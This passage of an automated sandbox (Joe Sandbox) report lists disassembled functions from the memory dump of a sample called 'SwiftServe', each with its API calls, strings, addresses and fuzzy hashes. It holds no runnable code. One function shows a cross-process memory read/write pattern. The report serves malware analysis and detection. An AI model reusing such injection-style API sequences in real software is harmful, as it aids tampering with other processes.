Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5a5bb1bb7171cf29ba0b7d74a51b096fd5621db6a9924a6f062f5499154923c2
Instruction ID: 8f64e1253eff9244704c9fa0e12ecf2b25fadfb449b6e5c54ecb4b06b15a1326
Opcode Fuzzy Hash: 5a5bb1bb7171cf29ba0b7d74a51b096fd5621db6a9924a6f062f5499154923c2
Instruction Fuzzy Hash: C6F0AF30241204AFEB211FE69C8CE673BACEF59758F108625FA08E2190CA60EC04DB60

Function 00E78D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E78D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D75

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0944e3574dc1b5388919848d47f6c8357f4e8ecd27fa78553ee707407e4d1453
Instruction ID: ae12dd0d6c5a6ddf7dfcc19069476f7e23e941edcff1350062cbe80978fdd442
Opcode Fuzzy Hash: 0944e3574dc1b5388919848d47f6c8357f4e8ecd27fa78553ee707407e4d1453
Instruction Fuzzy Hash: D4F0C230241204AFEB211FAAEC8CF673BACEF99758F044215FA48E2190DB70ED04DB60

Function 00E7CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E7CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E7CDA7
MessageBeep.USER32(00000000), ref: 00E7CDBF
KillTimer.USER32(?,0000040A), ref: 00E7CDDB
EndDialog.USER32(?,00000001), ref: 00E7CDF5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6e77d37d114fdd2583f702841090c08c2c1455032f06a1abb8bfc954fa61e17d
Instruction ID: 074def83ff5a27b0b9f4740f462c92af5746f2f29233b1de1b0cdde8252da07f
Opcode Fuzzy Hash: 6e77d37d114fdd2583f702841090c08c2c1455032f06a1abb8bfc954fa61e17d
Instruction Fuzzy Hash: 6A014F70500704AFEB315B61DD4EBA77BACBB04705F10566EE696B14E1DBE0B9588B80

Function 00E2178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E2179B
StrokeAndFillPath.GDI32(?,?,00E5BBC9,00000000,?), ref: 00E217B7
SelectObject.GDI32(?,00000000), ref: 00E217CA
DeleteObject.GDI32 ref: 00E217DD
StrokePath.GDI32(?), ref: 00E217F8

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 94886723a4ef2d3e859c33950a4ae516a8c81fe9dffe7587d0131d74a5787913
Instruction ID: 5d1bca602fba03c0940e3126e175d47a406795d9d7a836df9263e7716a8fd430
Opcode Fuzzy Hash: 94886723a4ef2d3e859c33950a4ae516a8c81fe9dffe7587d0131d74a5787913
Instruction Fuzzy Hash: ABF0FB30008298AFDB295F57FC8C75A3BA4A761365F049355F469781B0C7315699DF14

Function 00E2E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FE6: std::exception::exception.LIBCMT ref: 00E4101C
Part of subcall function 00E40FE6: __CxxThrowException@8.LIBCMT ref: 00E41031

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E31680: _memmove.LIBCMT ref: 00E316DB

__swprintf.LIBCMT ref: 00E2E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E2E431

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 98e36278eeea44368c950501fc51609a18e4360312f749a9974ac97d6e24227f
Instruction ID: b9fa2301e93d100c6dee0682448c0053b8dd0b8526f60f51950e4d4d575b9da7
Opcode Fuzzy Hash: 98e36278eeea44368c950501fc51609a18e4360312f749a9974ac97d6e24227f
Instruction Fuzzy Hash: BE9191721183219FC714EF24E895C6EBBE4EF95744F00695DF486B72A1EA30ED44CB92

Function 00E4523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E452CD

Part of subcall function 00E50320: __87except.LIBCMT ref: 00E5035B

Strings

pow, xrefs: 00E452A5, 00E452C2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f180b3ef8dd304fe17368aa51f0c67cca23ac30b98f6a1aa704845eb2625779c
Instruction ID: f2690de20dce9ef30a5478ae450b85a9c81568746d155cce87801785e221a5b8
Opcode Fuzzy Hash: f180b3ef8dd304fe17368aa51f0c67cca23ac30b98f6a1aa704845eb2625779c
Instruction Fuzzy Hash: AE51BE6290960187CB116F14D9413AA6BE49B00756F30BD69F8E1B62BBEF748CCCDA46

Function 00E40654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00E40690
#, xrefs: 00E40699

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 7a01ea99842fc066bae00e713414b48d4142311066501c4367e3db1bb167a84f
Instruction ID: 7872d4ade3378d1ac3f611925a1fbc59b5be07e218b1e0db9e3b574b8da4b65c
Opcode Fuzzy Hash: 7a01ea99842fc066bae00e713414b48d4142311066501c4367e3db1bb167a84f
Instruction Fuzzy Hash: 17514875500245CFEF19EF68D484AFA7BA0EF55328F14A066FC95BB290D734AC42CB62

Function 00E2E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E2E937
_memmove.LIBCMT ref: 00E2E9D0
_free.LIBCMT ref: 00E2E9F6
_memmove.LIBCMT ref: 00E2EAA9

Strings

#V, xrefs: 00E2E9E2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove$_free
String ID: #V
API String ID: 2620147621-3658881132
Opcode ID: 98ab598547a6f87b4b0ef81bdf5107114d86c1291b1bc59ee122ed559ff0c91a
Instruction ID: a6a0ce49108edfd95287bb45daabeadb617d2000b606f9c45a95989bc806e5f1
Opcode Fuzzy Hash: 98ab598547a6f87b4b0ef81bdf5107114d86c1291b1bc59ee122ed559ff0c91a
Instruction Fuzzy Hash: 2A516A716087618FDB24CF28D881B2BBBE1FF85354F08592DE599A7351E731E801CB92

Function 00E3CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E3CFC2
_memmove.LIBCMT ref: 00E3D060
_memset.LIBCMT ref: 00E3D084

Strings

ERCP, xrefs: 00E3CF2D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 67c8ec27c2ab16359ecdbfe036ceeebe5b946ac8fe97c21d759d4717e72e44e9
Instruction ID: 2ae44f585d97f34f968d97d0bd54ec936b66e2e051b186d3db9a4c5d12d48600
Opcode Fuzzy Hash: 67c8ec27c2ab16359ecdbfe036ceeebe5b946ac8fe97c21d759d4717e72e44e9
Instruction Fuzzy Hash: AE51C0B190430A9BCB24CF64D8857AABBE5EF48714F24A56EE44AFB241E731D586CF40

Function 00E7A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E79E4E,?,?,00000034,00000800,?,00000034), ref: 00E81CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E7A3F7

Part of subcall function 00E81C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E79E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00E81CB0

Part of subcall function 00E81BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00E81C08
Part of subcall function 00E81BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E79E12,00000034,?,?,00001004,00000000,00000000), ref: 00E81C18
Part of subcall function 00E81BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E79E12,00000034,?,?,00001004,00000000,00000000), ref: 00E81C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E7A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E7A4B1

Strings

@, xrefs: 00E7A4C9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: fa81313da348fe48a5465a62965621a045c21b45471d302e3991e54a0bfe1799
Instruction ID: caa48a9a39f66514c5b7b08155aa7bf0eec0fc2f59f0d738f696ba3189539061
Opcode Fuzzy Hash: fa81313da348fe48a5465a62965621a045c21b45471d302e3991e54a0bfe1799
Instruction Fuzzy Hash: 6B416E7290021CBFCB14EFA4CD85ADEBBB8EF45300F1441A5FA59B7180DA716E85CBA1

Function 00EA79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EA7A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EA7A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EA7ABE

Strings

SysMonthCal32, xrefs: 00EA7A51

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 16b7535c11a920a73fe1960b287cc54ec5aefd5f4416906f53eadbd9963e48d7
Instruction ID: 23e39b25fe8e6b874b1e394b3742fda1c33c2b2afb4d9431d3623a682c7569bf
Opcode Fuzzy Hash: 16b7535c11a920a73fe1960b287cc54ec5aefd5f4416906f53eadbd9963e48d7
Instruction Fuzzy Hash: F5219C32610218BFDF11CE50CC82FEB3BA9EB49724F111214FE547B190EAB1B8548BA0

Function 00EA81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EA826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EA827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EA8284

Strings

msctls_updown32, xrefs: 00EA81E9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: eb0c50b2e67b90a063cf18c5d892ad7608b97373a395d48f3f87dfb817c961ed
Instruction ID: 902188c1e6384b0b58ab2b0aabf367211a2252a6c414c19eca8d54884a19ea8e
Opcode Fuzzy Hash: eb0c50b2e67b90a063cf18c5d892ad7608b97373a395d48f3f87dfb817c961ed
Instruction Fuzzy Hash: 7F217CB1604259AFDB10DF68DCC5DB737EDEB5A3A8B041159FA01AB261DB70EC11CAB0

Function 00EA72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EA7360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EA7370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EA7395

Strings

Listbox, xrefs: 00EA732D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f87a2cb06465c7878ab8cdc359928ea0ea5aeea676d3d631319e533b44f2af05
Instruction ID: 495fd1ce8427aad9c29f7fdaf854073d93d31497950ce2bc9386da59f1f0619c
Opcode Fuzzy Hash: f87a2cb06465c7878ab8cdc359928ea0ea5aeea676d3d631319e533b44f2af05
Instruction Fuzzy Hash: B221D332204118BFDF11CF54CC81EBF37AAEB8E754F029125F940AB190D671AC559BA0

Function 00EA7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EA7D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EA7DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EA7DB9

Strings

msctls_trackbar32, xrefs: 00EA7D6E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e99921e286bcaf339c026fae0dbf6de81719cb1abf938ed78c77058fab4c5da9
Instruction ID: cb0126758b4e4c4dba21dd2257ca03ee7f718bb574e14bc3dc27b0bf472a2040
Opcode Fuzzy Hash: e99921e286bcaf339c026fae0dbf6de81719cb1abf938ed78c77058fab4c5da9
Instruction Fuzzy Hash: 4311E772244208BEDF109F75CC45FE77BA9EF8A754F115119FB81BA090D671A851DB20

Function 00E5B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E5B544: _memset.LIBCMT ref: 00E5B551

Part of subcall function 00E40B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E5B520,?,?,?,00E2100A), ref: 00E40B79

IsDebuggerPresent.KERNEL32(?,?,?,00E2100A), ref: 00E5B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E2100A), ref: 00E5B533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E5B52E
=, xrefs: 00E5B514

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=
API String ID: 3158253471-1801005180
Opcode ID: 88008d8e15e27d713668f6ea96d9b4c9bf9d1ccb85c97d7c812c6718a58515a1
Instruction ID: 3d8ebe85e4d5f3f4ff3c1e102f19df5c235762a1da829526d183277405697b77
Opcode Fuzzy Hash: 88008d8e15e27d713668f6ea96d9b4c9bf9d1ccb85c97d7c812c6718a58515a1
Instruction Fuzzy Hash: 6EE06DB02003118FD3249F36E509B037AE0AF04305F009A1DE886EA351EBB5E54CCB91

Function 00E9C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E6027A,?), ref: 00E9C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E9C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 00E9C6F3
kernel32.dll, xrefs: 00E9C6E2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: a326573a391502246fe6aa184747a78f2c0ebbc2730df33ab3f651c4d6bce8ea
Instruction ID: a1495205aa173522d387b4b9868ec9a6aed8547323efed02107f241b591b5267
Opcode Fuzzy Hash: a326573a391502246fe6aa184747a78f2c0ebbc2730df33ab3f651c4d6bce8ea
Instruction Fuzzy Hash: 72E0C2B8210302CFDB20AB7ACC49A4776D8FF04749F60A82BE895F2310E770E8408F10

Function 00E34BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E34AF7,?), ref: 00E34BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E34BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00E34BC4
kernel32.dll, xrefs: 00E34BB3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 2fede8fc760062039478cbaa97277dec2fc6128a1cf7a6ec5cc8631a0d7eb0ed
Instruction ID: 4eef851d4c4d70a5f62753bb6d78e91fdec3b5b307b1a852edbc8a532fa8d6e4
Opcode Fuzzy Hash: 2fede8fc760062039478cbaa97277dec2fc6128a1cf7a6ec5cc8631a0d7eb0ed
Instruction Fuzzy Hash: 5ED012705107128FD7205F35DC08747B6D5AF05395F11AC6AD4D5F2594EA70E484C650

Function 00E34B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E34B44,?,00E349D4,?,?,00E327AF,?,00000001), ref: 00E34B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E34B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00E34B91
